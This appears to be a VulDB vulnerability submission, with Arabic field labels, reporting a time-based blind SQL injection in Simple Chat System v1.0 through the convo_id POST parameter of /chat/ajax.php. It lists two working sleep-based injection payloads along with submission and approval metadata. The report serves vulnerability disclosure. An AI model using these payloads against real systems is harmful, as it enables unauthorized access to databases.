| عنوان | Simple Chat System v1.0 /chat/ajax.php?action=read_msg POST parameter convo_id exists SQL injection vulnerability |
|---|
| الوصف | Simple Chat System v1.0 has SQL injection.
Vulnerability URL: /chat/ajax.php?action=read_msg
POST parameter convo_id exists SQL injection vulnerability.
Payload1: convo_id=1' and (select 2 from (select(sleep(10)))t) and 'q'='q&user_id=2
The response time is 10 seconds.
Payload2: convo_id=1' and (select 2 from (select(sleep(15)))t) and 'q'='q&user_id=2
The response time is 15 seconds. |
|---|
| المصدر | ⚠️ https://github.com/sikii7/CVE/blob/main/SQL.md |
|---|
| المستخدم | sikii (UID 47840) |
|---|
| ارسال | 31/05/2023 08:39 AM (3 سنوات منذ) |
|---|
| الاعتدال | 31/05/2023 10:00 AM (1 hour later) |
|---|
| الحالة | تمت الموافقة |
|---|
| إدخال VulDB | 230348 [SourceCodester Simple Chat System 1.0 POST Parameter ajax.php?action=read_msg convo_id حقن SQL] |
|---|
| النقاط | 20 |
|---|